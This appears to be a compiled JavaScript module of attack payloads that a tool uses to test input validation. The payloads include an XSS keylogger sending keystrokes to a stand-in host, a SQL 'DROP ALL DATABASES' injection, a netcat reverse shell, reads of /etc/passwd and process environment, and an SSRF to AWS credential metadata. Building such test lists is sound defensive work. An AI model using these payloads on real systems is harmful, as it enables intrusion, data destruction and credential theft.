"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
const severity_level_1 = require("../severity-level");
exports.STRING_ATTACKS = {
    COMMON: [
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Basic XSS injection'],
            payload: '<script></script>',
            tags: ['xss', 'basic']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['JavaScript keylogger through advanced XSS'],
            payload: `<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>`,
            tags: ['xss', 'advanced', 'keylogger']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Basic SQL injection'],
            payload: '"; DROP ALL DATABASES; --',
            tags: ['sql', 'basic']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Advanced MySQL injection'],
            payload: `1' ORDER BY 1--+`,
            tags: ['sql', 'mysql', 'advanced']
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Advanced PostgreSQL injection'],
            payload: `';create table persistent (data varchar(200));--`,
            tags: ['sql', 'potgresql', 'advanced']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['NodeJS RCE assuming eval() afterwards'],
            payload: `require("child_process").exec('nc <IP Attacker> 4445 -e /bin/sh')`,
            tags: ['eval', 'rce']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`NodeJS RCE assuming eval() afterwards`],
            payload: `something%0Acat%20/etc/passwd`,
            tags: ['eval', 'rce']
        },
    ],
    PATH_TRAVERSAL: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: [`Extracting environment using dedicated process file`],
            payload: '/proc/self/environ',
            tags: ['path-traversal']
        },
        {
            severity: severity_level_1.SeverityLevel.LOW,
            messages: ['XSS attempt through file name'],
            payload: `<svg onload=alert(1)>.png`,
            tags: ['path', 'xss']
        }
    ],
    EMAIL: [
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['RFC-compliant email bypass'],
            payload: '"><svg/onload=confirm(1)>"@domain.com',
        }
    ],
    IP: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No IP restriction on private ranges may cause SSRF'],
            payload: `127.0.0.1`,
            tags: ['ssrf']
        }
    ],
    HOSTNAME: [
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['No local hostname restriction on may cause SSRF'],
            payload: `localhost`,
            tags: ['ssrf']
        }
    ],
    URI: [
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Joi URI without scheme allows JavaScript inclusion'],
            payload: `javascript:alert('')`
        },
        {
            severity: severity_level_1.SeverityLevel.HIGH,
            messages: ['Fetching UNIX file content on server'],
            payload: 'file:///etc/passwd'
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['Port scan attempt using HTTP scheme with localhost'],
            payload: 'http://127.0.0.1:22',
            tags: ['ssrf']
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['Including SVG malicious image'],
            payload: 'http://brutelogic.com.br/poc.svg'
        },
        {
            severity: severity_level_1.SeverityLevel.MEDIUM,
            messages: ['SSRF attack on AWS bucket'],
            payload: 'http://instance-data/latest/meta-data/iam/security-credentials/',
            tags: ['ssrf', 'aws']
        }
    ]
};
